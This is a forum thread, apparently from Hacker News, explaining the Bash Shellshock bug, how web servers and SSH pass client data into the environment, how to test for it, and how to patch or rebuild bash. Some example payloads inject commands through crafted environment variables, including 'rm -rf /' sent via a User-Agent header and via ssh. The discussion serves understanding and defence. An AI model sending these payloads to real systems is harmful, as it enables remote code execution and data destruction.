There's some misunderstanding of how the one-liner works, so here's a writeup.
You can break the one-liner into two lines to see what is happening.
1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
3. bash: warning: badvar: ignoring function definition attempt
4. bash: error importing function definition for `badvar'
5. I am an innocent sub process in 4.3.25(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!
2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash spots the specially formed variable (named badvar), prints a warning,
4. ...and apparently doesn't define the function at all?
5. But other than that, the child bash runs as expected.
And now the same two input lines on an OLD bash:
1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
3. vulnerable
4. I am an innocent sub process in 4.3.22(1)-release
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!
2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!
4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)
Lots of internet-facing software fills env vars with user data: Apache may set several SSL_* and HTTP_* vars, ssh may set LC_*, LANG, TERM, etc.; procmail and other SMTP filters probably have their fair share too.
The moment any child process of these hits a system()- or popen()-like call, /bin/sh initializes and may hit the bug.
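The plumbing is easy to see locally. This sketch (the variable name is just a CGI-style example) shows that anything exported into the environment rides into every child shell spawned later:

```shell
# any exported variable is handed verbatim to every child process,
# including shells spawned later via system()/popen()
export HTTP_USER_AGENT='whatever the client sent'   # hypothetical CGI-style var
bash -c 'echo "child saw: $HTTP_USER_AGENT"'        # prints: child saw: whatever the client sent
```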
So it's a sort of injection attack that targets inputs to bash that manage to bypass normal sanitisation?
Apache takes SSL_* headers, say, from a client and simply passes those to BASH, and this exploit means that BASH will execute a payload dropped into the header? Am I close? Wouldn't that also be an Apache [httpd] bug, in that it's allowing unsanitised user data to hit the shell?
Similarly are you saying that if I set a LANG variable and SSH to a server that the server will use that variable to give to BASH, even if it's not a recognised LANG variable?
Perhaps I'm misunderstanding as such things would be massive holes any way regardless of this BASH issue.
From the example code at the top of the thread it seems that you only need to affect a single variable, that bash reads, in order to pwn the whole server.
Interestingly on Ubuntu the BASH update for this is rated "medium".
It's kind of the equivalent of a web app that basically evals any given GET parameter with a specially crafted value.
Apache sets environment variables, it does not pass user input directly to bash as code or anything like that. The fact that bash can be tricked to execute this code is a problem that needs to be addressed by bash, not any other software.
>"Apache sets environment variables, it does not pass user input directly to bash as code or anything like that." //
This is contrary to how I'm understanding the situation. BASH, or whichever shell is being used, sets environment variables; Apache httpd et al. pass off some user data (from clients, eg browser headers) to the shell to set variables under limited circumstances [like use of CGI], no? Then when BASH gets initialised something is happening in the parsing of variables causing statements included with the variable (which variable can be a function definition) to be executed.
I realise now that as things stand you can't sanitise many of the fields [like http client headers] as they don't have well defined forms. But setting variables for use by BASH seems as close to "pass user input directly to bash" as you're going to get.
Mainly I'm doubting that all these different apps duplicate code to set env variables when the shell already knows how to do it, doesn't seem very *nixy. Happy to be corrected as I'm - as I'm sure you've guessed - a bit out of my depth.
Sorry for the late reply -
you can think of environment variables as basically HTTP headers for bash scripts. They are one way to pass user input to a bash script. While you want bash to make those environment variables available to the bash script, you don't really want any code in their value to be executed (unless, of course, your script does that on purpose).
httpd with CGI does not alter your bash script by prepending a set of variable assignments (which, of course, would be a very bad idea) - it simply sets values that are then passed to bash. The bash parser then can be tricked into executing code in those environment variables.
In a webserver, like Apache, environment variables are set from headers sent by the client, e.g. each header like Cookie would produce variable like HTTP_COOKIE. These variables can contain any data that the user sent. If Apache uses external code (like PHP, Ruby, Python, etc.) to process the request, it may pass these variables to that code, and if that code runs some command on the system, these variables may be passed to the command shell, which would lead to code contained in the variable to be executed at that point.
This can also happen with other service processes, such as OpenSSH, which sets the SSH_ORIGINAL_COMMAND variable to the command that the user supplies. That may allow people to break out of restricted accounts, i.e. accounts that are supposed to run just one command (ssh-based services like SVN or Git may be an example), and run arbitrary commands as that user.
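The web-server path described above can be simulated locally with a harmless payload (the header name is made up, and a plain `echo` stands in for attacker code):

```shell
# what a CGI server effectively does: put a client-controlled header value
# into the environment, then spawn a shell at some point while handling the request
env 'HTTP_USER_AGENT=() { :; }; echo injected-code-ran' bash -c 'echo serving request'
# an unpatched bash prints "injected-code-ran" before "serving request";
# a patched bash prints only "serving request"
```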
As an analogy, suppose I go to a website written in PHP and register with the username "Robert'); DROP TABLE Students;--". A correct PHP script will sanitize the name; it'll escape the quote and run something like `update users set name='Robert\'); DROP TABLE Students;--'`. If mysql then ignores the backslash and drops the Students table, that is definitely a mysql problem and not a PHP problem. Doing any more on the PHP side to "sanitize" the name would actually break the script by screwing up valid names.
In this case, the shell variables are correctly sanitized by Apache or whatever, and then mishandled by bash. For example, imagine this very simple system:
- Web server receives a GET request with the user's name.
- Web server sets the environment variable USERS_NAME='<whatever was submitted with quotes escaped>'.
- Web server sends back the result of running `bash print_welcome_message.sh`.
It might not be considered great design, but there's nothing inherently insecure in this system, and there are plenty of actual systems that more or less work this way. And it's also perfectly valid for a user to have the name `() { :;}; echo vulnerable`. It ought to work fine to set USERS_NAME to that value and send back `Welcome, () { :;}; echo vulnerable.`
Instead, an unpatched bash will execute the contents of USERS_NAME. The only way for the web server to prevent that would be to change the user's name, which would be wrong behavior -- given a properly working shell, it would print the wrong name in the response. The web server does its sanitization job correctly when it successfully sets USERS_NAME in spite of any single quotes or what-have-you -- this part isn't its problem.
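To make the hypothetical concrete, `print_welcome_message.sh` (a made-up script) need only be:

```shell
#!/bin/bash
# print_welcome_message.sh -- only ever treats USERS_NAME as text
echo "Welcome, ${USERS_NAME}."
```

The script itself never executes USERS_NAME; on an unpatched bash the payload fires while the environment is being imported, before this first line even runs. On a fixed bash, `USERS_NAME='() { :;}; echo vulnerable' bash print_welcome_message.sh` prints the literal `Welcome, () { :;}; echo vulnerable.`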
CGI scripts are the most obvious way - when executing a CGI script, each HTTP header gets translated into an environment variable - but I have no doubt there are all sorts of odd network-facing apps which set environment variables and then run a command, even if you're not running CGI scripts.
Surely though the CGI framework sanitises the headers first? Otherwise this seems like a pretty predictable problem; isn't "always sanitise user data" the cardinal rule of backends?
I can certainly imagine that I might have designed a web page that passed user input direct to a BASH script to do a ping or some such, but not if it's public facing.
What sanitization do you expect the CGI framework to apply to the header value representing the user agent? str_replace($userAgent, '() {', 'no bash bug for you')?
Only a few environment variables are given any meaning by the system. Other environment variables don't have any predefined meaning and can be any null-terminated string.
Indeed, lol. It's a bit clearer to me now. Thanks for your comment.
It seems like a sort of loose typing issue. Perhaps if when setting environment variables the app using them could specify a type (eg nonExecutableText) such that bash knows it's receiving textual content that mustn't be executed; would that help?
That's not really the risk with this vulnerability. Piping a web-sourced script to bash has always been a vulnerability, but it's one that you choose to live with when you do it.
The reason this is newsworthy is that there are some network-facing programs (CGI-based web servers, some SSH configurations) that will set the value of some environment variables to a user-supplied value, which bash will then execute when that program spawns a new process.
If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.
So, as an amateur sysadmin of a decently popular side project, what should I do? I've read over the post on the mailing list, and I think I understand the basic attack, but I'm having trouble understanding exactly how an attacker could run bash on my server and what I therefore need to patch (though I suspect that's intentional). Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?
If you just want to upgrade bash, and prevent services like nginx, fpm, and apache from being restarted in production, you can run `sudo apt-get update && sudo apt-get install --only-upgrade bash`
Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?
Upgrades should not require any restarts, and no restarts are required for you to stop being vulnerable - as this only affects newly created bash sessions, not already running ones.
Debian's package manager has the nasty habit of stopping affected daemons before all the upgrades and starting them afterwards, leaving you with serious downtime.
> Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?
I don't think it will, for a couple of reasons. OpenSSL is integrated into other services as a library, while bash would be called as an external application. I also noticed that once I upgraded bash, the proof of concept stopped working in a terminal I opened prior to the upgrade.
It appears that Linode changes /etc/apt/sources.list to point to their own mirror of Ubuntu repositories, and as far as I can tell those are not updated yet. So I guess the solution is to wait or edit sources.list. Just FYI if you're on their systems!
For releases in-between, you should be able to manually download one of those versions from http://archive.ubuntu.com/ubuntu/pool/main/b/bash/ and install it. I wonder how many vulnerable boxes there are that won't get these updates because Ubuntu stops support after 9 months. There must be tons of boxes running 13.10, it's not even a year old yet.
It probably ensures that you get the Linode-customized flavors of packages where such exist, so that, for example, you don't inadvertently upgrade your kernel to a build without the ability to mount Linode disks.
Linode can't modify packages; they're signed by the upstream distro. (Unless Linode added a key of their own to your apt keychain (apt-key list), but I've never seen that.)
fwiw, Linode's mirrors are up with the latest version, yet Digital Ocean's are not. I lose faith in DO every time I remote into my VM. They just seem like an amateurish shop.
Debian security updates are distributed from security.debian.org, which is separate from the normal Debian mirror network, and Debian discourages the mirroring of security.debian.org because security updates are time sensitive. Hopefully Digital Ocean is not mirroring security.debian.org.
If I understood this bug correctly, it happens during bash's initialization. If I'm right, already running instances of bash are not vulnerable, and new instances will use the fixed executable, so no reboot would be necessary for this bug.
$ apt-cache show debian-goodies
<SNIP>
checkrestart - Help to find and restart processes which are using old
versions of upgraded files (such as libraries)
I don't know if Ubuntu has pushed a patched version of bash, but bash is what you should update. Someone already posted a way to test whether your version is vulnerable.
You might also look into changing the default shell (but beware, scripts with bashisms in them...).
you should apply all security updates, reliably, periodically, regardless of HN posts.
you're probably not directly vulnerable to this very vuln, but then again, maybe you are. With enough vulns it gets complex enough to check that it's easier to just apply all the security updates.
We just updated our scanner and included this CVE. You can run Detectify to see if your setup is vulnerable. We offer a recurring service that runs continuously and alerts you if you are exposed to new emerging vulnerabilities. This removes some of the complexity of always being on top of security alerts.
Looks like the patched version and the pre-patch version show the same version string, or am I being stupid and missing something?
ayourtch@mcmini:~/bash-patch$ ls
bash_4.2-2ubuntu2.2_amd64.deb bash-builtins_4.2-2ubuntu2.2_amd64.deb t
ayourtch@mcmini:~/bash-patch$ dpkg -x bash_4.2-2ubuntu2.2_amd64.deb t
ayourtch@mcmini:~/bash-patch$ diff -c t/bin/bash /bin/bash
Binary files t/bin/bash and /bin/bash differ
ayourtch@mcmini:~/bash-patch$ t/bin/bash --version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ayourtch@mcmini:~/bash-patch$ /bin/bash --version
GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ayourtch@mcmini:~/bash-patch$ sha1sum t/bin/bash
9eeed02173db163b013933eff3b8c6aa3697f67f t/bin/bash
ayourtch@mcmini:~/bash-patch$ sha1sum /bin/bash
3384fadf84146a4d4b6b7f529f615e9947b4ac99 /bin/bash
ayourtch@mcmini:~/bash-patch$
"If you are responsible for the security of any system, this is your immediate, drop-everything priority."
Why don't you explain in plain English exactly why you feel this is the case - "drop everything", in other words (or even close to that)? Give some scenarios. After all, anyone who knows a great deal doesn't need that advice; the people who need that advice are the ones who don't know enough to know what the impact of this is. [1]
Perhaps you could clarify with some examples of why (see child comment "So, as a amateur sysadmin of a decently popular side project") you think this applies to anyone who is "responsible for the security of any system"?
[1] Me for one because I'm not seeing the "Drop everything" priority for any of the systems that I have control over given the way they are configured. That said I'd like to hear more of course.
Any library anywhere in any application you run that calls out to bash that is called by any other library in that application, so long as that application is somehow hooked up to a web server, is potentially an unauthenticated GET request away from code execution; the exploit for this is potentially so simple that attackers can craft a single request, spider the Internet, and collect shells from applications you run that you forgot you even ran, at which point they'll own your whole data center.
So for example if you don't run web servers that are front facing on the internet (and you trust your (for example) intranet) then does this become an "asap" rather than a "drop everything"?
"is potentially an unauthenticated GET request"
Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?
The attack surface of this bug may very well be the largest attack surface of any bug in history. Update bash. Just update bash. Everywhere. On everything you have it on. Don't think about whether, just think about how.
(Note I'm not claiming this is the "worst bug ever"... there's stiff competition for that claim. But most of the rest of the "worst bug ever"s I can think of are some point that failed, some particular thing you could do for full root access or something. I can't think of anything else with this sheer staggering surface area.)
Unauthenticated GET requests were just an example of something that can invoke this behavior. If you have any network-enabled service that's capable of spawning a shell, you can have attack vectors open.
Possible vectors include things like DHCP clients, SSH, web servers, etc. Lots of things open shells for reasons you wouldn't intuitively expect. It's very likely that there are many creative vectors for exploitation that will be discovered in the coming hours.
I ask because I've seen SSIDs with meaningful characters ()<>;? cause trouble with some network managers. I presumed at the time that this was due to the SSID string being passed as an argument to some script.
I've encountered this on my old Android phone and my old Debian laptop. I encountered it often because a friend of mine used to have an emoticon in the SSID for his home router. (Really annoying! I couldn't connect to anything when his router was in range.)
Note: it could very well have been a different problem. I didn't investigate.
> Are you saying that if you don't have a web server that allows "get" requests (only posts) then this exploit is not an issue at all?
Usually no. This exploit works with any HTTP method. Unauthenticated GETs are the lowest-security class of HTTP calls, so if even they can be used as an attack vector, you should pay attention.
Because this allows execution of arbitrary commands from any unsantized environment variable.
Web servers pass information about the HTTP client to CGI scripts using environment variables. A CGI script written in bash would be vulnerable to arbitrary command execution if any HTTP header contained the vulnerable string.
GET / HTTP/1.0
User-Agent: () { :; }; rm -rf /
Restricted SSH accounts (like the ones used by GitHub) have a setting to restrict the user to a specific command (e.g. /usr/local/bin/run-git-only --github-user=octocat). The original command is passed in an environment variable SSH_ORIGINAL_COMMAND. If bash is used anywhere along the way (say, if /usr/local/bin/run-git-only --github-user=octocat is a shell script), then this is a problem:
ssh git@example.com '() { :; }; rm -rf /'
There are surely lots of other ways to get servers to run bash shells with arbitrary environment variables. That's why this is bad.
Edit: as others have pointed out, even non-bash CGI scripts that use a shell to run external processes are vulnerable. For example, system("/usr/local/bin/whatever --some-fixed-option") would normally be considered safe, since there's no untrusted data in the command line (although perhaps it would be considered poor design), but it'll run a shell to do the whitespace splitting. If that shell is bash....
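That system() point is easy to demonstrate: system() is defined to run its string via `/bin/sh -c`, so a hostile environment rides along even though the command line itself is fixed (bash stands in for /bin/sh here, and the payload is a harmless echo):

```shell
# system("/usr/local/bin/whatever --some-fixed-option") is roughly
#   /bin/sh -c '/usr/local/bin/whatever --some-fixed-option'
# so the shell imports the environment even though no user data is in the command:
env 'x=() { :; }; echo rode-along' bash -c '/bin/echo running fixed command'
# unpatched bash: prints "rode-along" first; patched: only "running fixed command"
```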
At least SCRIPT_FILENAME is user input, isn't it? I'm really not sure, but I'd like some clarity. It shouldn't work, because it's likely impossible to have () at the beginning of SCRIPT_FILENAME? But can someone give some hints? It's common to have a bash/sh wrapper script: https://httpd.apache.org/mod_fcgid/mod/mod_fcgid.html#exampl...
IIUC, you're already pwned after the first line of your wrapper script, i.e. #!/bin/bash, as your CGI environment was already set before, and now you're running bash in it (unless FastCGI works differently, not by setting the environment as plain old CGI; I don't know FastCGI, but from a quick glance I think it works similarly)
FastCGI does work differently – it spawns a process which stays open and communicates with it over stdin / stdout – but that doesn't mean that his PHP script doesn't unexpectedly invoke system() somewhere.
This script here is run when the process is spawned and spawns the PHP process that listens to stdin/stdout. Similar scripts exist in most install of mod_fcgid. E.g. PLESK, Virtualmin, other ISP-Panels... It boils down to look at what environment variables are there when bash runs this script or not? Once bash starts and grabs the environment variables the exploit starts.
So, considering there are other variables in there that can be manipulated, it would be possible to own a large chunk of the servers on the Internet. However, I'm not sure if there is a caveat, and I had hoped that someone could help me.
Edit: Looks safe. These variables are not even there. It's just an outdated script.
I'm a relative newcomer to the command line and have been Googling around for what exactly the () {:;} is doing with no luck. Does anyone have a good link or explanation?
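For what it's worth: `()` followed by a body is the syntax bash uses to serialize an exported function into an environment variable, and `:` is the shell's no-op builtin, so `() { :; }` is just "a function that does nothing" - the minimal value that triggers the function-import code path. The same shape, written normally (bash-specific, since `export -f` is a bashism):

```shell
f() { :; }          # a function whose body is the no-op builtin ':'
export -f f         # export it; bash encodes it as '() { ... }' in the environment
bash -c 'type f'    # a child bash re-imports it and reports that f is a function
```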
There is a reason PHP is to be kept away and not touched with a ten meter stick; it seems to spawn a shell for weird reasons. I don't think python or groovy apps do that. They're safe, unless you somewhere specifically invoke System.getRuntime().run("bash");
PHP never "spawns a shell for weird reasons" - it spawns a shell if you ask it to. Just as any other language would, if you ask it. Still, many apps may use the shell indirectly - e.g. to execute some system function, to call out to some tool, etc. - and those may be vulnerable even if the original code was not a CGI script. Moreover, you don't have to run bash specifically - any command execution may go through a shell, which may be bash, e.g. Runtime.getRuntime().exec() in Java. Thus it may not be very easy to pinpoint all the places where this bug could sneak in.
> groovy apps do that [... if] you somewhere specifically invoke System.getRuntime().run("bash");
That's a one-liner in Groovy, written in the Java style of chained method calls, which is the direct equivalent of spawning a shell in non-JVM languages, so that's not an argument for using Groovy instead of PHP.
If bash is invoked at any point in the response cycle you are pwned; not just if you are directly exposing a shell script. How confident are you that this never happens on any computers anywhere on your network ever?
That's ridiculous. You may as well say that every time you put a python script up, you're exposing the entire Python runtime and deserve to get 'pwned'.
The scope of the risk is limited to script that you write, whether bash or Python.
To be fair, with all the various ways how shell scripts (not only in bash) interpolate, evaluate, substitute etc., the typical shell language is much, much harder to keep safe against code injection than say Python (or even PHP). After all, code injection/evaluation is actually what you want in a shell script, half of the time.
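A two-line illustration of that point, using a harmless marker string:

```shell
msg='$(echo INJECTED)'   # hostile "data"
echo "$msg"              # quoted expansion keeps it inert: prints $(echo INJECTED)
eval "echo $msg"         # one extra round of parsing turns it into code: prints INJECTED
```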
Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)
This applies even if your shell script or shell snippet uses the full paths to commands. For instance:
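(The example originally attached to this comment isn't preserved here; the following sketch shows the kind of thing meant. Whether a given patch level will still import such a function from the environment varies, so this only demonstrates the shadowing itself, in-process, using bash's `function` keyword:)

```shell
# bash allows a function name to shadow even a full path to a command
function /usr/bin/id { echo "not the real id"; }
/usr/bin/id    # prints: not the real id
```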
Attacker-controlled environment variable names are a rare scenario, and one that probably has you hosed no matter what. Attacker-controlled environment variable values, on the other hand, are not so rare, and if not for this vulnerability they wouldn't be a problem.
More specifically: The environment in general is an attack vector. I mean, it's global input that crosses execution domains! Any name/value pair could potentially mess with any number of programs in unexpected ways. A user should not be able to control any environment changes, period. Of course, whether or not this is practical is an exercise for the sysadmin.
It's not just you. The fact that an environment variable can override e.g. "git" to do something else is a real problem requiring separate protection. However, that's effectively PATH injection rather than code injection so it's already addressed in many cases.
I agree. In the next few months, we'll probably be finding out about some of the cases where neither existing sanitization nor the half-fix for this problem was sufficient to prevent exploits in this family. :(
The vulnerability was released, what, a few hours ago? With a major vulnerability, waiting around for a "proper" fix is probably not a good idea. Get in a hot-patch to minimize the damage, then work on a "proper" fix...
Can anyone confirm that this is still a security issue?
My reading of this is that it's weird, and it's certainly a bug in the parser, but because you don't get to put the executable code in the environment variable it's not an RCE exploit like the last bug was.
Does anyone have confirmation that this new bug allows you to RCE with control of the value of an environment variable alone?
Of course, that doesn't mean there isn't one. It's clearly a reasonably significant issue - the setting of environment variables can cause unintended file system writes (and the same parsing bug can be used for reads) - and you're better off assuming that someone will determine an exploit based on it.
That was my initial reaction too, but I'm not so sure now that the bash maintainer has responded. I'm trying to get a better PoC working.
edit: OK, I give. I don't understand how this is different from,
env z='' echo oops
So, assuming you have Stupid Server 2.0, and SS 2.0 allows you to send an Accept: header with,
'' evil command here
...you still need to find a way to execute that command, which is different from CVE-2014-6271, which caused functions embedded in environment variables to be executed when they were read.
I know you're just teasing, but I've got a machine with an arch install from over two years ago that's still running great. Just did an -Syyu to get bash updated.
I've got a Debian VM I maintain for giggles, and just out of masochism I've been running "apt-get update" and "apt-get upgrade" for a while and watching nothing change. Am I doing something wrong, or is the whole process just slow?
deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free
Yeah, I was current yesterday and I'm current today, with both apt-get update and upgrades. Your version number is lower than mine, you must be on either stable or testing.
ii bash 4.3-9 i386 GNU Bourne Again SHell
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
From the FAQ:
> Does sid have security updates?
Not in the same sense that stable does. If the maintainer of a package fixes a security bug and uploads the package, it'll go into sid by the normal means. If the maintainer doesn't do that, then it won't. The security team only covers stable (and possibly testing... there's a pending issue for that case).
This is what happens when you have two different processes doing IPC using a human interface mechanism.
Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.
The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.
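A shell-level flavor of the same principle is the difference between splicing data into code strings and passing it as an argument vector:

```shell
name='$(cat /etc/passwd)'               # hostile "data"
bash -c 'echo "Hello, $1"' _ "$name"    # data stays data: prints Hello, $(cat /etc/passwd)
# bash -c "echo Hello, $name"           # DON'T: interpolation would run the payload
```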
Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:
#assume that your sources are in /src
cd /src
wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
#download all patches (numbering starts at 001; there is no bash43-000)
for i in $(seq -f "%03g" 1 25); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
tar zxvf bash-4.3.tar.gz
cd bash-4.3
#apply all patches
for i in $(seq -f "%03g" 1 25); do patch -p0 < ../bash43-$i; done
#build and install
./configure && make && make install
Not sure if Ubuntu 8.04 with a custom-built bash will be upgradable to 10.04?
Or you could just download a bash-static deb from 10.04 (https://launchpad.net/ubuntu/lucid/+package/bash-static) and overwrite /bin/bash. It shouldn't cause any issues when upgrading, though you could back up the original.
8.04 is unsupported, and situations like this justify the effort of upgrading it to the latest LTS.
A target patched for CVE-2014-6271 will output the date upon executing that PoC (Proof of Concept):
bash: var: line 1: syntax error near unexpected token `='
bash: var: line 1: `'
bash: error importing function definition for `var'
Thu Sep 25 17:52:32 EDT 2014
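For reference, the PoC in question is presumably the widely circulated one for CVE-2014-7169; reconstructed from the error output above (which names the variable `var`), it looks like:

```shell
cd "$(mktemp -d)"                       # scratch dir, so the dropped file is easy to spot
env var='() { (a)=>\' bash -c "echo date"
cat echo 2>/dev/null
# on a bash vulnerable to CVE-2014-7169, the broken parse leaves the '>' redirection
# pending, so a file named 'echo' is created containing the output of 'date';
# a fully patched bash just prints "date" and creates no file
```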
There is a new update (#26) for bash 4.3 which fixes CVE-2014-7169 (the old bash update was still flawed/incomplete as demonstrated above by executing the PoC). So, taking into account what everyone before contributed, the new complete patch code would be:
This sequence failed for me because my Ubuntu 8.04 didn't have patch installed.
I found a source copy at https://launchpad.net/ubuntu/+source/patch/2.5.9-4 and built/installed that first. The resulting fix appears to work (after copying resulting bash to /bin as noted elsewhere).
I had the same problem. I needed to install patch, make and gcc. So I downloaded the iso from http://old-releases.ubuntu.com/releases/hardy/ and then edited /etc/apt/sources.list so my server would look on the cd for the packages. I could then use 'apt-get install' to install the required programs.
I also found that the 'do' command was throwing up an error. Rather than work out why I just manually downloaded the 26 patches and then manually applied them as well. Yeah ok I'm a noob but it worked.
I am running Ubuntu 10.10 but patch is not installed. Can someone explain the commands needed to download, build, and install patch as mentioned above. Thanks for any help.
Given the circumstances, a lot of people without much software experience will be reading this message and simply copying and pasting; it's worth getting it right.
On Ubuntu, you'll probably want to ./configure --prefix=/usr --bindir=/bin . If you install under /usr/local (the default prefix), the bash you actually run will effectively no longer be updated by apt-get.
That script assumes that it is executed as root.
There's indeed a possible problem with /usr/local/bin/bash vs. /bin/bash with Ubuntu update from 8.04 to 10.04 (since Ubuntu 8.04 itself is no longer updateable), thus I asked that question in the end of my post. To mitigate it, one can just add:
I tried this and realized it installs the binary under /usr/local/bin. You'll need to make a symlink, or preferably follow ricilake's advice; if you forget to do this and log out, you may never log back in. Btw, the path to bash on Ubuntu is /bin/bash, not /usr/bin/bash.
I successfully patched my 8.04 server and passed the test.
I used sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install after retrieving and patching the bash build files.
Hi, I have tried to follow the instructions given by rtmdivine to patch CVE-2014-6271, but at the end of the process I still get the date. Any suggestions? Thanks
It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.
Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.
I am sure tons of people reading already know this, but I have a habit of saying this everywhere I see system() mentioned anywhere on the internet, just in case somebody reading is tempted to use it: system() is evil, please for the love of god never use it.
If you need to invoke another program use execve() and friends. The versions that end in -p will even check PATH for you. You don't need a shell to evaluate your arguments. Cut out the middle man and pass the arguments directly. It will save you a lot of stupid bugs.
There's nothing wrong with using system() anywhere you would happily cover your eyes and paste the string content into a shell. That shouldn't be many places, if anywhere, in production software. It's fine for simple things that would have been shell scripts anyway, were it not for the need to do XYZ.
The API for system() is not great, but the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting. As long as you're not passing arguments from outside sources to the command, using system() should be OK.
> the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.
Maybe not in C, but they are a drop-in replacement in just about every scripting language. Perl, Ruby, and Python all have nice high-level calls that mostly mimic system() but use execve underneath: you simply pass multiple arguments instead of a single string. A single-string system() call in your production web app server code is almost certainly incorrect.
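The multi-argument form can be sketched in Python (used here since the thread itself shells out via os.popen; the hostile filename is an invented example):

```python
import subprocess

# An attacker-controlled string that would be lethal if pasted into a shell:
hostile = "song.wav; echo pwned"

# List form: the arguments go to execve() directly and no shell ever parses
# them, so the semicolon is just an ordinary character inside one argument.
out = subprocess.run(["echo", hostile], capture_output=True, text=True)
print(out.stdout.strip())  # the semicolon stays literal
```

The design point is that there is simply no parsing step in which metacharacters could be reinterpreted.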
Sadly I think PHP still doesn't have this.
> As long as you're not passing arguments from outside sources to the command, using system() should be OK.
Very true, but think about whether you really need a shell to launch your command (are you using any shell features?). If not, why not just launch the command directly?
Would you execute random Perl or Python code from the internet? No, you wouldn't, even if you tried to sanitize it a thousand ways from Sunday. So why would you do so for the shell?
Defense must use different strategies than offense. An engineer's goal should be to reduce the problem space to something as small as possible, so he has a better chance at implementing a correct solution. Allowing the shell to be invoked is a good way to explode your exploitable surface area.
Anybody who coded in the 1990s knows to stay away from the shell like the plague, even though the syntax parsing and evaluation components in modern shells have improved considerably. Sadly this particular bug harks back to the bad days, when it was more difficult to tell how certain constructs would be evaluated.
It's not that you can't theoretically do it securely, it's just that you're gratuitously playing with fire--fire that has burned countless engineers in the past. The cost+benefit is so indisputably skewed toward little cost and huge risk that it's unprofessional to suggest otherwise.
The shell shouldn't come anywhere near network-facing software, period.
> are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.
I never claimed it as a drop-in replacement. I think you know the solution to these problems. (I guess maybe someone who naively uses system() might not, so perhaps I need to work on a better spiel.)
> As long as you're not passing arguments from outside sources to the command, using system() should be OK.
Personally I've seen too many bad uses of system() to make that a thing. Maybe they'll not realize it's subject to PATH and that PATH can be untrusted. Maybe they'll not realize they sometimes have asterisks and spaces in a filename. And so forth...
Debian 7 doesn't look to be vulnerable by default (if the code snippet can be trusted to work):
[arch/testbed ~] uname -a
Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
[arch/testbed ~] env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
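The same probe can be driven programmatically. A Python sketch, assuming bash (or, failing that, /bin/sh) is available; on a fixed shell the payload is ignored and only the echoed text appears:

```python
import os
import shutil
import subprocess

# Fall back to /bin/sh if bash isn't installed (dash ignores the payload too).
shell = shutil.which("bash") or "/bin/sh"

# The classic crafted variable, passed only to the child's environment:
env = dict(os.environ, x="() { :;}; echo vulnerable")
out = subprocess.run([shell, "-c", "echo this is a test"],
                     env=env, capture_output=True, text=True)

# On a vulnerable bash, "vulnerable" is printed before the echoed text.
vulnerable = out.stdout.startswith("vulnerable")
print("vulnerable" if vulnerable else "not vulnerable")
```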
Squeeze doesn't have regular security support anymore. A subset of packages on i386 and amd64 are receiving long term security support, but you need to enable the Squeeze LTS repo:
Last dist-upgrade was about a week ago, all indications point towards the bash released back in Jan 2013. It's fixed in 4.2+dfsg-0.1+deb7u1 and I'm running 4.2+dfsg-0.1
Well, that's very odd because that command reports vulnerable on an unpatched Debian system, but fails with exactly that error message on a patched system.
You're right and my comment was unclear. I'm just saying that the impact on Debian will be less than on distros using /bin/bash for /bin/sh. Of course, even a lessened impact can still be really bad!
